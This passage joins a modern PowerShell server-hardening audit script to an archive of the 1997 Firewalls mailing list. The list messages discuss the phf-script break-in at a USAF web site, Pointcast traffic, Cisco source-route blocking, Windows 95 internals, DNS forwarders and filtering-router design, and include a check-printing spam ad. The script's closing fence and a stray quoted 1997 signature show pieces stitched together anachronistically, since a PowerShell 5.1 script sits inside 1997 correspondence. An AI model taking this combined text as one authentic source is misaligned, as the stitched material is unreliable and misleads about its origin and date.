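# Server with PowerShell 5.1+, the NetSecurity and NetAdapter modules, and
# an elevated session. The values below are constructed examples.
$allowedAutomatic = @('EventLog', 'W3SVC', 'LanmanWorkstation', 'PlugPlay')  # assumed allow-list
$webRoot          = 'C:\InetPub\wwwroot'                                     # assumed web root

function Get-UnexpectedAutomaticServices {
    # Services set to start automatically that are not on the allow-list
    Get-Service | Where-Object {
        $_.StartType -eq 'Automatic' -and $allowedAutomatic -notcontains $_.Name
    } | Select-Object Name, DisplayName, Status
}

function Get-WritableWebRootEntries {
    # Allow ACEs on the web root that grant any write or delete right to a
    # principal other than Administrators or SYSTEM (Everyone should be RX only)
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                       [System.Security.AccessControl.FileSystemRights]::Delete)
    $trusted   = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
    (Get-Acl -Path $webRoot).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights) -band $writeMask) -ne 0 -and
        $trusted -notcontains $_.IdentityReference.Value
    } | Select-Object IdentityReference, FileSystemRights, IsInherited
}

function Get-InboundRulesBeyondHttp {
    # Enabled inbound allow rules whose port filter is anything other than TCP/80
    Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow | ForEach-Object {
        $pf = $_ | Get-NetFirewallPortFilter
        $ports = ($pf.LocalPort -join ',')
        if (-not ($pf.Protocol -eq 'TCP' -and $ports -eq '80')) {
            [pscustomobject]@{ Rule = $_.DisplayName; Protocol = $pf.Protocol; LocalPort = $ports }
        }
    }
}

function Get-ExtraAdapterBindings {
    # Bindings enabled on any adapter besides IPv4 (ms_tcpip): file sharing,
    # client for MS networks, IPv6, and so on
    Get-NetAdapterBinding | Where-Object { $_.Enabled -and $_.ComponentID -ne 'ms_tcpip' } |
        Select-Object Name, DisplayName, ComponentID
}

function Test-BuiltinAdministratorRenamed {
    # The built-in Administrator account always has RID 500, whatever its name
    $builtin = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }
    return ($builtin.Name -ne 'Administrator')
}

'== Services set to Automatic outside the allow-list =='
Get-UnexpectedAutomaticServices | Format-Table -AutoSize
'== Principals with write access to the web root =='
Get-WritableWebRootEntries | Format-Table -AutoSize
'== Inbound firewall allow rules other than TCP/80 =='
Get-InboundRulesBeyondHttp | Format-Table -AutoSize
'== Enabled adapter bindings other than IPv4 =='
Get-ExtraAdapterBindings | Format-Table -AutoSize
"Built-in Administrator renamed: $(Test-BuiltinAdministratorRenamed)"
'== Audit policy (what the Security log will actually record) =='
auditpol /get /category:*
```

Each function returns objects rather than text, so the same script can be piped into Export-Csv from a scheduled task and diffed run to run; an empty result for the first four sections is the state Chris's steps aim at. The generic-rights values that show up on inherited ACEs cast to int like any other FileSystemRights value, so the write-mask test still holds for them.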
>Franke, 2Lt, USAF
>OIC, USAFE Web Tech Support 480-7905

From firewalls-owner Wed Jan 8 10:42:40 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04490 for firewalls-outgoing; Wed, 8 Jan 1997 09:46:23 -0800 (PST)
Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA04461 for ; Wed, 8 Jan 1997 09:46:07 -0800 (PST)
Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id MAA18010; Wed, 8 Jan 1997 12:42:50 -0500
From: Adam Shostack
Message-Id: <199701081742.MAA18010@homeport.org>
Subject: Re: USAF: how it was hacked
In-Reply-To: <199701080554.AAA17354@news2.mnsinc.com> from matrix at "Jan 8, 97 00:51:01 am"
To: smanning@mail1.mnsinc.com (matrix)
Date: Wed, 8 Jan 1997 12:42:50 -0500 (EST)
Cc: Firewalls@GreatCircle.COM
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sure we can keep the rumors to a dull roar. Make an official statement about how it was done.

Adam

| Matthew Patton wrote...
| >
| > Really quite anticlimactic. The infamous phf script was left active on
| > the server and was how they got in. Root, the whole 9 yards.
|
| Really? What are these statements based on?
|
| Could we please keep the rumors to a dull roar? Thanks!
|
| Stephen Manning, Special Agent
| Computer Crime Investigator
| Air Force Office of Special Investigations
| Voice: (301) 981-5469 - Fax: (301) 981-3087
|

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From firewalls-owner Wed Jan 8 11:35:56 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA09207 for firewalls-outgoing; Wed, 8 Jan 1997 11:02:24 -0800 (PST)
Received: from proton.llumc.edu (proton.llumc.edu [143.197.200.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA09191 for ; Wed, 8 Jan 1997 11:02:09 -0800 (PST)
Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.7.6/8.6.9) with SMTP id KAA29068; Wed, 8 Jan 1997 10:58:41 -0800 (PST)
Date: Wed, 8 Jan 1997 10:56:30 -0800 (PST)
From: Michael Baumann
To: Ken Barlow
cc: "'firewalls@GreatCircle.COM'" , "Starkweather; Mike"
Subject: Re: Pointcast
In-Reply-To: <2D3B3AC0.@acccorp.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 8 Jan 1997, Ken Barlow wrote:

> I find it's one of those subjects that costs a lot and
> produces _no_ benefit for the company.
>

And there is the rub. It produces *no* benefit to the company. It (ab)uses bandwidth. I had no problem at all with management when I suggested we configure our proxy to deny access to the pointcast network.

Just say no.

>
> ______________________________ Reply Separator _________________________________
> Subject: Pointcast
> Author: "Starkweather; Mike" at Internet
> Date: 1/7/97 1:29 PM
>
>
> I am wondering how the members of this mail list have handled the
> flood of traffic generated by Pointcast. It has buried our firewall
> (Tis Toolkit) with the huge number of requests it generates. Their
> I-Server seems to help some but not as much as I had hoped.
>
> If this is the wrong place for this question please redirect me.
>
> Mike Starkweather
> Anheuser-Busch
>

--
Michael Baumann
Optivus Technology Inc.|Loma Linda University Medical Center
San Bernardino, California. (909)799-8308 |Internet: baumann@llumc.edu

From firewalls-owner Wed Jan 8 11:40:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA08736 for firewalls-outgoing; Wed, 8 Jan 1997 10:54:41 -0800 (PST)
Received: from atzhcd3.gordon.army.mil (atzhcd3.gordon.army.mil [147.51.83.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA08672 for ; Wed, 8 Jan 1997 10:54:00 -0800 (PST)
Received: by atzhcd3.gordon.army.mil with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD6B.32083FB0@atzhcd3.gordon.army.mil>; Wed, 8 Jan 1997 13:52:32 -0500
Message-ID:
From: Thomas Duke
To: "'Firewalls@GreatCircle.COM'"
Subject: RE: USAF: how it was hacked
Date: Wed, 8 Jan 1997 13:52:31 -0500
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The military like any other organization has to realize they must pay for the skill sets necessary to perform these tasks. The majority of people that do these things are not skilled....and won't be until the military/gov figures out how to reward/pay IS professionals creatively like the military doctors/dentists. Why would I want to stay in the gov/mil business getting 1/2 my value?

>----------
>From: A. Omer Koker[SMTP:omer@superonline.net]
>Sent: Wednesday, January 08, 1997 7:50 AM
>To: 'Firewalls@GreatCircle.COM'; 'Matthew Patton'
>Subject: RE: USAF: how it was hacked
>
>Interestingly enough this specific hole was described in detail on the
>latest 2600mag.
>now you know they will start reading it...
>
>>----------
>>From: Matthew Patton[SMTP:patton@sysnet.net]
>>Sent: 08 Ocak 1997 Cartamba 01:09
>>To: Firewalls@GreatCircle.COM
>>Subject: USAF: how it was hacked
>>
>>No, this isn't about cdrom based web content.
>>
>>Really quite anticlimactic. The infamous phf script was left active on
>>the server and was how they got in. Root, the whole 9 yards.
>>
>>What's really funny is that no more than a week prior to the incident, I
>>suggested to ASSIST (the military's equiv of CERT, and now financial
>>sponsor of same) that in light of the minor poking around I did on a
>>handful of military web sites, that they needed to get the word out to
>>admins because so many servers were in a high state of misconfiguration
>>and just waiting to be exploited. 7 days later, boom!!
>>
>>I'm not sure on what grounds people place so much trust in the military
>>to do things right with respect to host and network security. I'm sure
>>there are segments that do a damn fine job, but seeing the abject lack of
>>skills and knowledge in the Pentagon area makes me a mite bit skeptical
>>and not a little ashamed. It's a wonder we don't see high profile
>>exploits on a routine basis. Don't get me wrong, the private sector
>>doesn't have their act together on many fronts as well.
>>
>>Now hopefully the thread can die in peace.
>>
>

From firewalls-owner Wed Jan 8 12:55:23 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA14270 for firewalls-outgoing; Wed, 8 Jan 1997 12:19:47 -0800 (PST)
Received: from manukau.govt.nz ([202.14.82.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA14178 for ; Wed, 8 Jan 1997 12:19:14 -0800 (PST)
Received: by kotuku.manukau.govt.nz id <35722>; Thu, 9 Jan 1997 09:30:34 +1300
Message-Id: <97Jan9.093034nzdt.35722@kotuku.manukau.govt.nz>
From: Matthew Thompson
To: "'Firewalls (inet/GreatCircle)'" , "'Sebastian Stache'"
Cc: "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'"
Subject: RE: Re: NCSA != NCSC
Date: Fri, 10 Jan 1997 11:13:28 +1300
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sebastian Stache[SMTP:zeb@sbbs.se] Wrote:
>Wilner informed me that:
>> Everything except boot-up depends upon the O/S. Nothing is below the "O/S
>> layer," nor does one speak of such a layer unless one intends "application
>as well as
>> layer" and doesn't know an application from an O/S, nor can a single byte be
>> sent or retrieved over a device (networked or otherwise) unless an O/S is
>> relied upon, nor can a single access to memory, disk, or what-have-you be ...
>Now suppose I wanted to use Drivespace, an MS technique to
>compress harddisks on the fly. Or even better, Stacker, a 3rd-
>party equivalent. Either of these would install themselves
>BELOW Windows 95 (and even more interestingly, in some respects
>even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS).
>To Windows 95 (and to DOS), the compression activities would
>be transparent, ie Windows would not *know* about them. Which
>of course is the whole point.

Bzzzst. Wrong.

When Win95 runs the "Real Mode DOS" it runs it in an x86 virtual machine. Here I'm talking about the DOS it uses to bootstrap the machine, load all "real mode" device drivers etc, not user started DOS sessions (which also run in separate x86 virtual machines). It heavily breakpoints this DOS code, and in fact will receive control back from DOS (without the DOS code's knowledge) at points it has determined it needs to, it will also catch many int calls to the BIOS and handle them in protected mode without "Real Mode DOS's" knowledge.

The BIOS and DOS aren't used for a hell of a lot any more (at least once '95 boots), not for Disk (unless no protected mode disk driver exists for the device), Screen, Keyboard, or Serial port I/O, and that's most of the BIOS. All these functions are handled by 32 bit protected mode device drivers which go straight to the hardware, and in almost all cases around DOS and the BIOS. There are exceptions to this, where Win95 has no protected mode driver for the device, it will use DOS and loaded device drivers effectively as the "device driver" to access the device. And calls to this "device driver" can end up back in the Win95 OS. Use of real mode DOS drivers is a choice, for backward compatibility, a choice you don't for example have with NT. However anyone who wants to set up Win95 for speed and stability will avoid real mode drivers like the plague.

With Win95, running the GUI is a choice, much like firing up X11 on top of Unix is, you can still have preemptively multitasked character mode sessions if you want to.

>I don't think there's any point in mentioning utilities that
>halt the computer when a virus is detected, or when battery
>status is low, or when the Debug-mode button is pressed, or
>when a source-routed packet arrives.

Well, under '95 these should (and are by all leading players) be implemented as 32 bit virtual device drivers. And a source routed packet is not going to get far on any OS without going thru the TCP/IP stack, which admittedly could be a real mode stack on 95, but that's not the sensible choice.

Win311 is an operating system, it offers preemptive multitasking, virtual memory, and controls file system and most I/O devices. It has more in common with Win95 architecturally than one (particularly if that one is in Bill Gates' marketing dept.) may wish to think. The common misconception, that windows 3.11 only offers cooperative multitasking stems from the fact that all Win16 apps are cooperatively multitasked within the same virtual machine and same address space, and all most users see is the cooperatively multitasking face of Win3.11, underneath, it's 32 bit, preemptive multitasking for virtual machines. This decision (UGH!) transfers forward to Win95 as well, which is why those wanting good stable Win95 performance avoid 16 bit apps like the plague as well. WinNT of course can run each 16 bit app in its own virtual machine (or a shared one if you choose).

Win95 is full of hacks and kludges, but for good reason, BACKWARD COMPATIBILITY. Users would have squawked long and loud about how "bad" or "incompatible" etc that Win95 was if all their 16 bit apps stopped running, and they could no longer use their WeeLee4000 CD-ROM drive, or EastClone9000 SCSI adapter just because no-one had written a protected mode driver for it yet.

You want a Microsoft OS without so many backward compatibility compromises? Get off 95 and onto NT.

Cheers, Matthew.

---------------------------------------------------------------------
Kiwitech Marine Solutions Ltd.
RaceTech, SailTech, PowerTech, Marine Software & Hardware
Web: http://www.kiwitech.co.nz, Email: mthomps1@kiwitech.co.nz
Phone: +64-9-307-0819 Fax: +64-9-307-6685 Mobile: +64-21-998-600
PO Box 5909, Wellesley Street, Auckland, New Zealand

From firewalls-owner Wed Jan 8 14:19:16 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA21467 for firewalls-outgoing; Wed, 8 Jan 1997 13:41:23 -0800 (PST)
Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA21455 for ; Wed, 8 Jan 1997 13:41:11 -0800 (PST)
Received: from kcann.taylormade.com (kcann.taylormade.com [205.226.160.70]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id NAA17764; Wed, 8 Jan 1997 13:40:36 -0800 (PST)
Message-ID: <32D412C5.42A2@ins.com>
Date: Wed, 08 Jan 1997 13:33:57 -0800
From: Kevin Cann
Reply-To: kevin_cann@INS.COM
Organization: ins.com.
X-Mailer: Mozilla 3.0 (Win95; I)
MIME-Version: 1.0
To: uscny8hb@ibmmail.com
CC: Firewalls@GreatCircle.COM
Subject: Re: internal filtering router - filter config?
References: <199701080648.WAA21235@miles.greatcircle.com> <32D3A3BF.5D36@dreamscape.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Simply use the 'no ip source route' global router command.

Steven E. Matkoski wrote:
>
> Firewalls-Digest wrote:
> >
> > In your external router you'd block any ICMP traffic going back and
> > forth, as well as any packets bearing one of your internal IP addresses,
> > as a source address, especially if these are going INTO your protected
> > network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill
> > any ports that your users will not be using, and leave just mail, web,
> > ftp, etc.
> >
> > ricardo
> > ralvarado@avantel.com.mx
>
> Thanks, I also read that you could block source-routed packets there,
> also.
> If I am using a cisco router, how does one go about this? or can I get a
> location for documentation.
>
> Thanks!
> -steve.
> matkoski@dreamscape.com

--
_____________________________________________________________
Kevin K. Cann                    International Network Services
Network Systems Consultant       111 Deerwood Road #200
Pager: 1-888-587-3119            San Ramon, CA 94583
(510) 831-4743
"PROVIDING THE POWER OF OPERABLE NETWORKS"
_____________________________________________________________

From firewalls-owner Wed Jan 8 15:30:33 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA27086 for firewalls-outgoing; Wed, 8 Jan 1997 15:15:17 -0800 (PST)
Received: from gamma.wantech.se (gamma.wantech.se [193.44.131.30]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA27050 for ; Wed, 8 Jan 1997 15:15:02 -0800 (PST)
Received: (qmail 2682 invoked by uid 503); 8 Jan 1997 23:14:37 -0000
Date: Thu, 9 Jan 1997 00:14:36 +0100 (MET)
From: Patrik Backstrom
X-Sender: pb@gamma.wantech.se
To: firewalls@greatcircle.com
Subject: Guardian 2.0 NAT on NT 4.0 troubles
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi everyone!

I haven't found a FAQ on the Guardian anywhere... is there one?

Anyway - I have installed Guardian Firewall 2.0 on a NT 4.0 machine, works fine.
But when I install the Guardian NAT on top of it, it suddenly refuses to let *any* traffic through the firewall. It doesn't matter what rules I add to either the Firewall or the NAT, it still refuses any traffic.

It's running on a Windows NT 4.0 Pentium machine, Service pack 1 & 2 installed, equipped with two 3COM 3C900 PCI 10MBit Ethernet cards.

Am I missing something, that is obvious to everyone else? :-)

Hope somebody can help me with this...

/pb

---------------------------------------------------------
Patrik Bäckström          Phone.....: +46-(0)707-881928
Timgatan 3                Homepage..: http://www.klingon.pp.se
415 08 Göteborg           E-Mail....: pb@techno.org
Finger pb@techno.org for my PGP Public Key
---------------------------------------------------------

From firewalls-owner Wed Jan 8 17:59:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08403 for firewalls-outgoing; Wed, 8 Jan 1997 17:42:36 -0800 (PST)
Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08381 for ; Wed, 8 Jan 1997 17:42:12 -0800 (PST)
Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ra138311 for ; Thu, 9 Jan 1997 02:41:46 +0100
Received: by ppp49.sbbs.se with Microsoft Mail id <01BBFDD6.54867FF0@ppp49.sbbs.se>; Thu, 9 Jan 1997 02:39:26 +0100
Message-ID: <01BBFDD6.54867FF0@ppp49.sbbs.se>
From: Sebastian Stache
To: "'Matthew Thompson'"
Cc: "'Firewalls (inet/GreatCircle)'"
Subject: RE: Re: NCSA != NCSC
Date: Thu, 9 Jan 1997 02:39:18 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Matthew Thompson wrote:
>With Win95, running the GUI is a choice, much like firing up X11 on top of
>Unix is, you can still have preemptively multitasked character mode sessions
>if you want to.

If you refer to Explorer.exe as the GUI, I agree, it's much like X-Window.
Windows 95 is however NOT much like X-Window, since it provides almost every kind of functionality you'd expect from an operating system. X-Window is little more than a shell. Win95 provides disk cache, long filenames, pipes, mailslots, RPC, network services and much more.

To demonstrate this point, go to your nearest Win95 box and edit SYSTEM.INI. Replace this line

Shell=Explorer.exe

with

Shell=Command.com

Now when you start Windows, you'll have the equivalent (hrm, well) of a Bourne shell, with multi-tasking and all. Care to try X-Window? Type "explorer". (I don't really think it matches neither Bourne nor X-Window ).

From firewalls-owner Wed Jan 8 17:59:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08402 for firewalls-outgoing; Wed, 8 Jan 1997 17:42:32 -0800 (PST)
Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08376 for ; Wed, 8 Jan 1997 17:42:02 -0800 (PST)
Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id na138307 for ; Thu, 9 Jan 1997 02:41:43 +0100
Received: by ppp49.sbbs.se with Microsoft Mail id <01BBFDD6.5258CA80@ppp49.sbbs.se>; Thu, 9 Jan 1997 02:39:22 +0100
Message-ID: <01BBFDD6.5258CA80@ppp49.sbbs.se>
From: Sebastian Stache
To: "'Matthew Thompson'"
Cc: "'Firewalls (inet/GreatCircle)'" , "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'"
Subject: RE: Re: NCSA != NCSC
Date: Thu, 9 Jan 1997 02:21:51 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Matthew Thompson wrote:
>>Sebastian Stache[SMTP:zeb@sbbs.se] Wrote:
>>Now suppose I wanted to use Drivespace, an MS technique to
>>compress harddisks on the fly. Or even better, Stacker, a 3rd-
>>party equivalent. Either of these would install themselves
>>BELOW Windows 95 (and even more interestingly, in some respects
>>even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS).
>>To Windows 95 (and to DOS), the compression activities would
>>be transparent, ie Windows would not *know* about them. Which
>>of course is the whole point.

>Bzzzst. Wrong.

>When Win95 runs the "Real Mode DOS" it runs it in an x86 virtual machine.
>Here I'm talking about the DOS it uses to bootstrap the machine, load all
>"real mode" device drivers etc, not user started DOS sessions (which also
>run in separate x86 virtual machines). It heavily breakpoints this DOS
>code, and in fact will receive control back from DOS (without the DOS
>code's knowledge) at points it has determined it needs to, it will also
>catch many int calls to the BIOS and handle them in protected mode without
>"Real Mode DOS's" knowledge.

A few facts, if I may.

Real mode can never be "run in an x86 virtual machine". If the expression had been semantically correct, it would have been contradictory. When "Real Mode DOS" is running, the processor is in real mode. When a DOS-box is run under Win95, the processor is in protected mode, with the VM (Virtual Mode) flag set.

HIMEM.SYS can be used to switch to protected mode in a controlled and cooperative manner. HIMEM.SYS is automatically loaded by the Win95 version of IO.SYS unless explicitly told not to.

Neither Drivespace nor Stacker are device drivers. The device driver for IDE devices resides in BIOS in modern (post -88) PCs. Both Drivespace and Stacker use a DOS extension technique to create new "virtual" devices with their own drive letters. The technique is exactly the same as MSCDEX and SUBST use. It is also exactly the same technique that is used by NET USE and Netware MAP. In all of the above cases, we are creating file components which are treated as black boxes by Windows, the operating system.
If I wanted to write my own version of NET.EXE, I would probably see to it that whenever a file containing the text "source routed packet" was requested to be stored on the remote host, I would triple-DES it. And Windows would not ever SEE this, since this functionality existed BELOW the operating system (Windows).

>Bzzzst. Wrong.

Wrong? Which word?

From firewalls-owner Wed Jan 8 18:30:25 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08765 for firewalls-outgoing; Wed, 8 Jan 1997 17:50:21 -0800 (PST)
Received: from wanggate (wanggate.wang.co.nz [192.58.229.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08752 for ; Wed, 8 Jan 1997 17:50:09 -0800 (PST)
Received: by wanggate (951211.SGI.8.6.12.PATCH1042/951211.SGI) for id OAA23893; Thu, 9 Jan 1997 14:49:28 +1300
Received: from wnx1(172.17.28.6) by wanggate via smap (3.1) id xma023877; Thu, 9 Jan 97 14:49:04 +1300
Received: by WNX1 with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.57) id <01BBFE3C.55BA34A0@WNX1>; Thu, 9 Jan 1997 14:49:37 +1300
Message-ID:
From: Mahesh Ravji
To: "'Firewalls@GreatCircle.COM'"
Subject: DNS forwarding to firewall
Date: Thu, 9 Jan 1997 14:49:35 +1300
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.57
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

I'm having problems getting Sun's in.named to forward requests to our firewall. We have a Bordaware firewall and multiple secondary DNS located at various sites. All secondary DNS's are running Solaris 2.5 and need to be configured to forward queries they can't resolve to the firewall. I have added the 'forwarders' directive to the named.boot file which looks something like this:

; named boot file for secondary server
;
directory /var/named
; type       domain                 source host/file    backup file
cache        .                                          named.ca
forwarders   a.b.16.8
slave
primary      .                                          db..
secondary    some.domain            a.b.64.227          db.some.domain
secondary    b.a.IN-ADDR.ARPA       a.b.64.227          db.a.b
primary      0.0.127.IN-ADDR.ARPA                       db.127.0.0

The DNS resolves all internal requests but does not appear to forward names that it can't resolve to the firewall. Has anyone else configured a similar setup in a Solaris environment?

TIA

Mahesh Ravji                     Phone: +64 4 382-0100
Wang NZ Ltd.                     Fax: +64 4 385-6067
195-201 Willis Street            E-Mail: Mahesh.Ravji@wang.co.nz
PO Box 6648
Wellington
New Zealand

From firewalls-owner Wed Jan 8 18:45:04 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA10212 for firewalls-outgoing; Wed, 8 Jan 1997 18:15:34 -0800 (PST)
Received: from mtigwc02.worldnet.att.net (mailhost.worldnet.att.net [204.127.129.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA10195; Wed, 8 Jan 1997 18:15:04 -0800 (PST)
Received: from Default ([153.35.0.194]) by mtigwc02.worldnet.att.net (post.office MTA v2.0 0613 ) with SMTP id AAD20151; Thu, 9 Jan 1997 00:33:40 +0000
From: printerm@softcell.net
Date: Wed, 08 Jan 1997 19:36:59 PST
Subject: CheckRite Laser Checks! (B)
Message-ID: <19970109003156.AAD20151@Default>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The (B) means "bulk class mail", we put that there so you will be able to tell that you have a bulk mail without having to open it. We also put that there so you can filter us out if you wish. Please put REMOVE in the subject and press reply if you do not wish to receive mail from us again.

CheckRite 2000 by Printerm
MICR LASER CHECK PRINTING
The fast approach to convert from Pre-printed checks to laser check printing

DOWNLOAD FREE DEMO SOFTWARE FROM OUR WEB SITE http://bisinc.com/printerm/

Conversion from costly pre-printed checks to lower cost laser technology may save you as much as 8 cents per check.
Printerm offers you a software package which allows a smooth link-up between your Accounting Software and your Laser Printer. Laser printing eliminates costly outside check form printing bills and allows the use of blank paper stock. Laser check printing means you will not have to contend with stocking large quantities of pre-printed checks which can become obsolete because of address changes, company name and changes in financial institutions. Printerm offers a full digitizing service to convert forms, logos and authorized signatures to digital data. These digitized items may be used on your mainframe computers or if you are using a HP LaserJet 4Plus, 4Si, 5 or 5Si printers they may be stored on a font cartridge or a flash simm. The font cartridge for the HP 4 series is simple to plug into the printer when check printing is required. The flash simm has to be mounted onto the MIO board in the HP LJ 5 and 5Si printers. HP Flash Cartridges and simms are programmed by Printerm with your check data and can assist you with your conversion program. FlashProm or simm products are available in various sizes from 256K up to 2MB. These products are reprogrammable to allow updating of data and can store forms, logos and authorized signatures for several different companies. Flash technology data storage allows your printer to print at maximum speed since there is no spooling delay of large files from your computer to the printer. You are able to print checks for several different companies with laser printing without experiencing delays caused by changing check stock. The MICR font provided by printerm is to ABA-X9 standards to ensure acceptance of your checks by banking institutions. Security is easy with Printerm's approach to laser printing. Pre-printed blank checks which may be lost or stolen are no longer required. 
The HP FlashProm cartridge (used to store check forms, signatures and logos) and the MICR (Magnetic Ink) toner cartridge are easily removed and stored in a secure area preventing un-authorized use when check printing is not required. The CheckRite 2000 package available from Printerm provides that essential back-up between your accounting software and the laser printer. CheckRite 2000 provides the software to allow printing of laser checks from a PC or Mainframe computer without having to buy MS-ACCESS, dBase or other software. Each laser check is numbered when the printing occurs and is easily audited with your accounting program. Features of the CheckRite 2000 * Password security * Scanned signatures and logos are printed as part of the check * Account Screen maintains company and bank detail * Print blank checks and check books * Issue checks on demand for numerous companies and accounts * Import Text/ASCII data into CheckRite 2000 database * Historical log of checks printed with all details stored * Print checks on Laser Bond check paper or standard laser paper Printerm offers full support services to get your laser check printing operational ** MICR toner and HP LaserJet MICR printing Kits are also available from Printerm. For further information please contact: Charles Katz:Printerm Datascribe,Inc.| printerm@softcell.net 300 Pearl St., suite 200 | voice:716-842-3099 Buffalo,NY 14202 | Fax: 716-842-6049 WEB Site: http://bisinc.com/printerm/ Download a Free Demo now!!!!! 
From firewalls-owner Wed Jan 8 19:15:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA12143 for firewalls-outgoing; Wed, 8 Jan 1997 19:04:02 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA12125 for ; Wed, 8 Jan 1997 19:03:33 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0viAle-0004FTC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 9 Jan 1997 04:02:58 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Thu, 9 Jan 97 04:02 MET Received: by lina id m0viAf1-0004j2C (Debian Smail-3.2 1996-Jul-4 #2); Thu, 9 Jan 1997 03:56:07 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: internal filtering router - filter config? To: uscny8hb@ibmmail.com Date: Thu, 9 Jan 1997 03:56:06 +0100 (MET) Cc: Firewalls@GreatCircle.COM In-Reply-To: <32D3A3BF.5D36@dreamscape.com> from "Steven E. Matkoski" at Jan 8, 97 08:40:15 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > Thanks, I also read that you could block source-routed packets there, > also. You should block them on the external router to protect your DMZ from spoofing attacks. 
Usually an external (in front of DMZ/firewall) and an internal (after DMZ/firewall) filtering router will do the following (apart from routing of course :)

external:
  spoof protection
  DMZ protection
internal:
  spoof protection
  internal net protection
  snoop protection from DMZ/firewall

with:

spoof protection is
  block all packets with source address from inside on external interface
  block all packets with source address not from inside on internal interface
  block all reserved/not-routed networks
  block all unusual packets like broadcast and multicast and source routed
  block all oversized packets or broken packets

DMZ protection is
  allow only connections to certain ports of the DMZ/firewall hosts

internal net protection is
  allow only connections to certain/no ports of internal hosts
  optionally allow all outgoing connections

snoop protection is
